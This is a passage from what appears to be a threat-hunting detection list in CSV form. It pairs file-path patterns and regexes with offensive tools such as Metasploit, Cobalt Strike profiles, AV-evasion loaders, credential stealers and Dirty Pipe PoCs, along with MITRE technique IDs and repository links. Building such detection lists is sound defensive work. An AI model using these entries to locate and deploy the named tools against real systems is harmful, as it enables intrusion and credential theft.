tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/Exegol-images-*.zip*",".{0,1000}\/Exegol\-images\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/Exegol-images.git*",".{0,1000}\/Exegol\-images\.git.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/ExeStager/*",".{0,1000}\/ExeStager\/.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - 
T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/exetotext.ps1*",".{0,1000}\/exetotext\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/exfilGui.ps1*",".{0,1000}\/exfilGui\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*/exfiltrate.exe*",".{0,1000}\/exfiltrate\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*/exocet.elf*",".{0,1000}\/exocet\.elf.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" 
"*/exocet.exe*",".{0,1000}\/exocet\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*/EXOCET-AV-Evasion.git*",".{0,1000}\/EXOCET\-AV\-Evasion\.git.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*/expl/expl.go*",".{0,1000}\/expl\/expl\.go.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","1","N/A","N/A","4","307","121","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" "*/exploit.cron.sh*",".{0,1000}\/exploit\.cron\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/exploit.dll*",".{0,1000}\/exploit\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/exploit.ldpreload.sh*",".{0,1000}\/exploit\.ldpreload\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/exploit.pbj*",".{0,1000}\/exploit\.pbj.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/exploit/linux/*",".{0,1000}\/exploit\/linux\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/exploit/remote/*",".{0,1000}\/exploit\/remote\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/exploit/windows/*",".{0,1000}\/exploit\/windows\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/exploit_orw.py*",".{0,1000}\/exploit_orw\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*/exploits/*.go*",".{0,1000}\/exploits\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/exported_credentials.csv*",".{0,1000}\/exported_credentials\.csv.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. 
Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*/exports_function_hid.txt*",".{0,1000}\/exports_function_hid\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","277","46","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*/extensions/kiwi/kiwi.rb*",".{0,1000}\/extensions\/kiwi\/kiwi\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ExtensionSpoof.exe*",".{0,1000}\/ExtensionSpoof\.exe.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","1","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*/ExtensionSpoofer.git*",".{0,1000}\/ExtensionSpoofer\.git.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","1","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*/ExternalC2/*",".{0,1000}\/ExternalC2\/.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/ExternalC2/*",".{0,1000}\/ExternalC2\/.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/extract_wifi.exe*",".{0,1000}\/extract_wifi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/ExtractBitlockerKeys.git*",".{0,1000}\/ExtractBitlockerKeys\.git.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*/f5_bigip_tmui_rce.rb*",".{0,1000}\/f5_bigip_tmui_rce\.rb.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" 
"*/Fa1c0n35/zabbix-cve-2022-23131*",".{0,1000}\/Fa1c0n35\/zabbix\-cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" "*/fake.html",".{0,1000}\/fake\.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/FakeCmdLine*",".{0,1000}\/FakeCmdLine.{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/fakelogonscreen*",".{0,1000}\/fakelogonscreen.{0,1000}","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. 
The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1273","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" "*/fake-sms.git*",".{0,1000}\/fake\-sms\.git.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2663","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*/Farmer.git*",".{0,1000}\/Farmer\.git.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*/fastfuz-chrome-ext*",".{0,1000}\/fastfuz\-chrome\-ext.{0,1000}","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","1","25","3","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z" "*/FastPathMITM.py*",".{0,1000}\/FastPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/fb_firstlast.7z*",".{0,1000}\/fb_firstlast\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "*/fb-brute.pl*",".{0,1000}\/fb\-brute\.pl.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*/fcrdns.nse*",".{0,1000}\/fcrdns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/febinrev/dirtypipez-exploit*",".{0,1000}\/febinrev\/dirtypipez\-exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","45","24","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*/Fentanyl.git*",".{0,1000}\/Fentanyl\.git.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*/fern-wifi-cracker/*",".{0,1000}\/fern\-wifi\-cracker\/.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Ferrari.ps1*",".{0,1000}\/Ferrari\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/ffuf.git*",".{0,1000}\/ffuf\.git.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*/ffuf/ffufrc*",".{0,1000}\/ffuf\/ffufrc.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*/fiesta.profile*",".{0,1000}\/fiesta\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/fiesta2.profile*",".{0,1000}\/fiesta2\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/FileCrawlerMITM.py*",".{0,1000}\/FileCrawlerMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a 
honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/FilelessPELoader*",".{0,1000}\/FilelessPELoader.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*/File-Server.ps1*",".{0,1000}\/File\-Server\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/final_shellcode_size.txt*",".{0,1000}\/final_shellcode_size\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
